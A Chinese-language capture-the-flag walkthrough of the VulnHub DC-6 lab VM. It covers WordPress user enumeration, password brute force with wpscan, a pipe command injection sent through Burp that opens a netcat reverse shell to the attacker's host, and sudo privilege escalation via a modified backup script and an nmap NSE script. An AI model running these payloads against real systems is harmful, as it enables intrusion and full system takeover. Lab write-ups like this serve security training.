DC-6

DC-6下载:https://download.vulnhub.com/dc/DC-6.zip.torrent

攻击者kali:192.168.1.11

受害者DC-6:192.168.1.10

通过arp-scan -l扫描到DC-6的IP地址，如果不确定的可以在虚拟机的网络设置查看DC-6的物理地址

使用namp 扫描DC-6

nmap -sS -A -p- 192.168.1.10

只有22和80端口

访问一下80端口

访问不上，但是有显示wordy

 

修改一下本地的hosts文件,修改成DC-6的IP地址

即可访问，打开后发现是wordPress的博客

使用wpscan来枚举看看有几个账号

wpscan --url http://wordy/ --enumerate u 

枚举出来了五个账号分别是admin、graham、mark、sarah、jens

在桌面创建一个dc6user.txt的文本并写入

使用kali下的usr/share/wordists/rockyou.txt密码字典进行爆破（这是官网给的提示）

进入到/usr/share/wordlists下你会发现有一个rockyou.txt.gz

需要解压才能得到rockyou.txt

gzip -c -d roukyou.txt.gz > /root//roukyou.txt

因为这个字典非常大，解压出来也是需要等一会才解压完，建议等个几分钟，如果在桌面打开rockyou.txt文档往下滑，看右边的进度条还在往下的话说明还在解压导出中。

因为密码字典太大，将密码筛选出来

cat rockyou.txt | grep k01 > dc6passw.txt

wpscan --url http://wordy/ -U dc6user.txt -P dc6passw.txt

得到账号mark 密码helpdesk01

扫描一下网站的目录看看从哪里登录

nikto -h

使用nikto扫描出来无结构

使用dirb扫描出来管理员登录界面

dirb http://wordy/

打开登录界面输入账号密码登录

登入进去后发现他使用了插件

页面这里也有个工具点击一看

从内容解释中说可以解析IP地址啥的

尝试输入域名看看，就输入靶机的

能执行

试试IP也能执行

原本想试试能不能命令注入，发现有长度的限制

只能尝试用burp来抓包修改看看

我输入的IP

发送到测试器看看

在IP地址后面加上命令注入看看

点击发送数据包

没有过滤还得到了响应

管道符命令注入成功，存在漏洞

哪这时候就可以在后面执行反弹shell

kali端进行监听

nc -lvnp 4444

burp修改命令注入

192.168.1.9|nc -e /bin/bash 192.168.1.11 4444

发送数据包

连接成功，大家监听前一定要先查看一下自己的IP 地址

打开交互模式

python -c 'import pty;pty.spawn("/bin/bash")'  必背

尝试提权

进入home目录看看有没有账号可登录

看到有四个文件

最后在mark下的stuff看到有个文本

好像是graham的密码

尝试ssh登录看看

ssh graham@192.168.1.10

登录成功

提权

sudo -l

提示jens下的脚本

是一个解压脚本的命令

将脚本修改一下，将/bin/bash写入脚本

echo "/bin/bash" >> backups.sh

用jens来执行

sudo -u jens ./backups.sh

进入到了jens用户下

使用sudo -l查看一下

又是一个提示，nmap可以执行root

在当前目录下常见一个脚本执行文件

echo "os.execute('/bin/bash')">demon.nse

sudo nmap --script=/home/jens/demon.nse

进入到root

cat /root/ theflag.txt

进入到root后输入命令不会显示出来，得回车了才会显示

DC-6总结

hosts定向

wpscan枚举账号(因为是WordPress博客)

wpscan账号密码爆破

dirb目录扫描得到admin登录地址

发现命令注入漏洞

使用burp抓包修改数据反弹shell

打开交互模式 python -c 'import pty;pty.spawn("/bin/bash")'

进入到home目录查看DC-6的用户目录

发现graham账号的密码，进行ssh登录成功

使用sudo -l查看权限

利用命令脚本转换到jens用户

发现可执行root的文件为nmap

创建一个nmap文件执行脚本

echo "os.execute('/bin/bash')">demon.nse

只想nmap文件执行脚本获取到root

sudo nmap --script=/home/jens/demon.nse

在root目录下拿到flag，转到root下之后执行完命令才会显示出来，打的时候不会显示命令